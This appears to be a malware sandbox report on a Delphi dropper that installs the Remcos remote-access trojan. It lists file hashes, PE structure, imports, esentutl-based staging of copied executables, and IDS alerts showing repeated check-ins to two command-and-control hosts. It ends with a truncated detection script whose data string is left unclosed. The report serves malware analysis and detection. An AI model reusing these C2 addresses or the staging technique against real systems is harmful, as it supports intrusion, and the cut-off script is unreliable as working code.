                                                                          Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\AWkpqJMxci.exe...Destination File: C:\\Users\\Public\\Libraries\\Bzaszylr.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x147000 (1339392) (1 MB)....Total bytes written = 0x147000 (1339392) (1 MB).......Operation completed successfully in 0.94 seconds.....

Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                          Category:dropped
                                                                          Size (bytes):560
                                                                          Entropy (8bit):4.532578488470501
                                                                          Encrypted:false
                                                                          SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
                                                                          MD5:4D6C195EBA3736E57EF6A03F1EEEF490
                                                                          SHA1:237210C613550627B46D6D6AB82F396EACA3EA20
                                                                          SHA-256:FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
                                                                          SHA-512:2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
                                                                          Malicious:false
                                                                          Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....

File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.186865824174257
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          File name:AWkpqJMxci.exe
                                                                          File size:1'339'392 bytes
                                                                          MD5:b4e2055b4877dcfcbf9a366106b15591
                                                                          SHA1:459f7b89e83d5be3581029dca3bb32d4c97d8156
                                                                          SHA256:096394b733ca53e65afa06302776c52330f2567d665a42e0c5463fe23c523e62
                                                                          SHA512:afafada21255956613393e13f8d67b1a4d1da780cad6cedc4bb5c01b3b17863e29e981548959b0790e2f40a2498fb6a04070289c551e2489e652b0e3e0525107
                                                                          SSDEEP:24576:lXcmzpu+0sDG7JD/7YnmDPd037ElJo7gZtnrQ5VlPgemhs2u+/T:lXZpxDfmS3wvo0ZtrQ5VZQhsD+/T
                                                                          TLSH:4B55BFD1EED04BBEC175287498FB826CD81D7F33693BA45666EBB8CC8A35251301186F
                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                          Icon Hash:2a6b92a2a25c7ca2
                                                                          Entrypoint:0x48089c
                                                                          Entrypoint Section:.itext
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:0f481911497086e6fe44037d9dba03dc
                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          add esp, FFFFFFF0h
                                                                          mov eax, 0047EEE8h
                                                                          call 00007F9591439771h
                                                                          mov eax, dword ptr [00526344h]
                                                                          mov eax, dword ptr [eax]
                                                                          call 00007F959148D0D9h
                                                                          mov ecx, dword ptr [005262DCh]
                                                                          mov eax, dword ptr [00526344h]
                                                                          mov eax, dword ptr [eax]
                                                                          mov edx, dword ptr [0047EDC0h]
                                                                          call 00007F959148D0D9h
                                                                          mov eax, dword ptr [00526344h]
                                                                          mov eax, dword ptr [eax]
                                                                          call 00007F959148D14Dh
                                                                          call 00007F959143710Ch
                                                                          lea eax, dword ptr [eax+00h]
                                                                          add byte ptr [eax], al

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x12b000 | 0x2738 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13a000 | 0x16c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x130000 | 0x92fc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x12f000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x12b758 | 0x618 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7e180 | 0x7e200 | 480059df31c00782ae91e489a7689ed1 | False | 0.5099359669226957 | data | 6.557120304046401 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x80000 | 0x8e4 | 0xa00 | e97a33970f357c828abe289a33acf875 | False | 0.5625 | data | 5.899993257593548 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x81000 | 0xa5544 | 0xa5600 | 7e55f2e0831571a45a644894a2835d59 | False | 0.5059509046674225 | data | 6.882376057695866 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x127000 | 0x36e8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x12b000 | 0x2738 | 0x2800 | d002923b21ce5b1cf1e6a8f3c7bde5e7 | False | 0.31943359375 | data | 5.16090217321333 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x12e000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x12f000 | 0x18 | 0x200 | 4938957014b3e155444a80ea766d5d23 | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x130000 | 0x92fc | 0x9400 | df37274b98963e114e8ecffa2b0aeb38 | False | 0.567066089527027 | data | 6.647145689843035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x13a000 | 0x16c00 | 0x16c00 | 7db24021d5a267d30d0b857126135700 | False | 0.19845681662087913 | data | 5.840909842729201 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x13abb4 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x13ace8 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x13ae1c | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x13af50 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x13b084 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x13b1b8 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x13b2ec | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x13b420 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x13b5f0 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x13b7d4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x13b9a4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x13bb74 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x13bd44 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x13bf14 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x13c0e4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x13c2b4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x13c484 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x13c654 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x13c73c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.3550656660412758
RT_ICON | 0x13d7e4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.23599585062240663
RT_ICON | 0x13fd8c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | | | 0.18806093528578177
RT_ICON | 0x143fb4 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m | | | 0.12523649358839606
RT_DIALOG | 0x14d45c | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x14d4b0 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x14d504 | 0x438 | data | | | 0.40925925925925927
RT_STRING | 0x14d93c | 0x4b0 | data | | | 0.335
RT_STRING | 0x14ddec | 0x3bc | data | | | 0.301255230125523
RT_STRING | 0x14e1a8 | 0x290 | data | | | 0.4817073170731707
RT_STRING | 0x14e438 | 0xc0 | data | | | 0.6770833333333334
RT_STRING | 0x14e4f8 | 0xec | data | | | 0.6483050847457628
RT_STRING | 0x14e5e4 | 0x350 | data | | | 0.43514150943396224
RT_STRING | 0x14e934 | 0x3cc | data | | | 0.37962962962962965
RT_STRING | 0x14ed00 | 0x388 | data | | | 0.4092920353982301
RT_STRING | 0x14f088 | 0x3ac | data | | | 0.3191489361702128
RT_STRING | 0x14f434 | 0x230 | data | | | 0.4875
RT_STRING | 0x14f664 | 0xcc | data | | | 0.6225490196078431
RT_STRING | 0x14f730 | 0x1bc | data | | | 0.5292792792792793
RT_STRING | 0x14f8ec | 0x3cc | data | | | 0.3683127572016461
RT_STRING | 0x14fcb8 | 0x3d4 | data | | | 0.36428571428571427
RT_STRING | 0x15008c | 0x2ec | data | | | 0.37566844919786097
RT_STRING | 0x150378 | 0x308 | data | | | 0.3427835051546392
RT_RCDATA | 0x150680 | 0x10 | data | | | 1.5
RT_RCDATA | 0x150690 | 0x378 | data | | | 0.6813063063063063
RT_RCDATA | 0x150a08 | 0x82 | Delphi compiled form 'TDataModule3' | | | 0.7769230769230769
RT_GROUP_CURSOR | 0x150a8c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x150aa0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x150ab4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x150ac8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x150adc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x150af0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x150b04 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x150b18 | 0x3e | data | | | 0.8709677419354839
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharNextW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringW, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll | GetErrorInfo, GetActiveObject, SysFreeString
ole32.dll | CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

The same DLL appears several times because the Delphi linker emits one import descriptor per unit that binds a library; this is the static import table of the Delphi dropper, and it is the ordinary VCL import set (the SetWindowsHookExA / CallNextHookEx / UnhookWindowsHookEx triple is used by the VCL's own message hooks). On its own this table does not distinguish the dropper from a benign Delphi GUI program; the Remcos capabilities listed in the signatures belong to the injected payload, not to these imports.
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP+Port (undelimited) | Protocol
2024-11-26T08:24:03.271330+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 142.250.181.33443 | TCP
2024-11-26T08:24:12.618349+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49732 | 162.216.243.152404 | TCP
2024-11-26T08:24:15.182174+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49733 | 192.169.69.262500 | TCP
2024-11-26T08:24:27.160184+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49740 | 162.216.243.152404 | TCP
2024-11-26T08:24:29.405914+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49741 | 192.169.69.262500 | TCP
2024-11-26T08:24:41.026788+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49742 | 162.216.243.152404 | TCP
2024-11-26T08:24:43.259234+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49743 | 192.169.69.262500 | TCP
2024-11-26T08:24:54.918541+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49744 | 162.216.243.152404 | TCP
2024-11-26T08:24:57.172177+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49745 | 192.169.69.262500 | TCP
2024-11-26T08:25:08.776100+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49763 | 162.216.243.152404 | TCP
2024-11-26T08:25:11.009478+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49769 | 192.169.69.262500 | TCP
2024-11-26T08:25:23.036101+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49800 | 162.216.243.152404 | TCP
2024-11-26T08:25:25.636529+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49806 | 192.169.69.262500 | TCP
2024-11-26T08:25:37.386560+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49831 | 162.216.243.152404 | TCP
2024-11-26T08:25:39.625415+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49837 | 192.169.69.262500 | TCP
2024-11-26T08:25:51.267856+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49862 | 162.216.243.152404 | TCP
2024-11-26T08:25:53.502242+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49868 | 192.169.69.262500 | TCP
2024-11-26T08:26:05.104315+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49894 | 162.216.243.152404 | TCP
2024-11-26T08:26:07.313945+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49900 | 192.169.69.262500 | TCP
2024-11-26T08:26:19.010690+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49927 | 162.216.243.152404 | TCP
2024-11-26T08:26:21.204631+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49933 | 192.169.69.262500 | TCP
2024-11-26T08:26:33.321104+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49961 | 162.216.243.152404 | TCP
2024-11-26T08:26:35.870577+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49967 | 192.169.69.262500 | TCP
2024-11-26T08:26:47.667527+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49994 | 162.216.243.152404 | TCP
2024-11-26T08:26:49.949304+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50001 | 192.169.69.262500 | TCP
2024-11-26T08:27:01.572309+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50027 | 162.216.243.152404 | TCP
2024-11-26T08:27:03.796690+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50029 | 192.169.69.262500 | TCP
2024-11-26T08:27:15.546500+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50030 | 162.216.243.152404 | TCP
2024-11-26T08:27:17.753208+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50031 | 192.169.69.262500 | TCP
2024-11-26T08:27:29.527066+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50032 | 162.216.243.152404 | TCP
2024-11-26T08:27:31.809755+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50033 | 192.169.69.262500 | TCP
2024-11-26T08:27:43.782138+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50034 | 162.216.243.152404 | TCP
2024-11-26T08:27:46.398618+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50035 | 192.169.69.262500 | TCP
2024-11-26T08:27:58.104667+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50036 | 162.216.243.152404 | TCP
2024-11-26T08:28:00.316675+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50037 | 192.169.69.262500 | TCP

The destination column runs the address and port together. For the JA3 row it is 142.250.181.33 port 443, the TLS connection in the TCP packet table below. For the two Remcos check-in destinations the boundary is not recoverable from this rendering: 162.216.243.152 port 404 or 162.216.243.15 port 2404, and 192.169.69.26 port 2500 or 192.169.69.2 port 62500. Take the host:port pairs from the "C2 URLs / IPs found in malware configuration" entry of this report before using them as indicators. Independently of the split, the table shows the implant polling the two destinations alternately, each on a fresh source port, at a near-constant interval of about 14 seconds.
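The regularity of the check-ins is the detectable property here, independent of which port the C2 listens on. The following Python is an editorial example added to this page, not code from the Joe Sandbox report or from Remcos; it parses the first seventeen rows of the alert table above (copied as constructed input, with the destination kept as the undelimited IP+port string the report renders, so it is used only as an opaque key and never split) and measures the check-in period and jitter per destination. The SID constant is the one in the table; the minimum-event count and the jitter threshold are assumed values chosen for the example.

```python
"""Check-in periodicity of the Remcos alerts in the report's IDS table.

Editorial example; not part of the Joe Sandbox report.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed input: the first 17 rows of the IDS alert table above, pipe
# delimited. The destination column is kept exactly as the report renders
# it (IP and port run together) and is only ever used as an opaque key.
ALERT_ROWS = """\
2024-11-26T08:24:03.271330+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 142.250.181.33443 | TCP
2024-11-26T08:24:12.618349+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49732 | 162.216.243.152404 | TCP
2024-11-26T08:24:15.182174+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49733 | 192.169.69.262500 | TCP
2024-11-26T08:24:27.160184+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49740 | 162.216.243.152404 | TCP
2024-11-26T08:24:29.405914+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49741 | 192.169.69.262500 | TCP
2024-11-26T08:24:41.026788+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49742 | 162.216.243.152404 | TCP
2024-11-26T08:24:43.259234+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49743 | 192.169.69.262500 | TCP
2024-11-26T08:24:54.918541+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49744 | 162.216.243.152404 | TCP
2024-11-26T08:24:57.172177+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49745 | 192.169.69.262500 | TCP
2024-11-26T08:25:08.776100+0100 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49763 | 162.216.243.152404 | TCP
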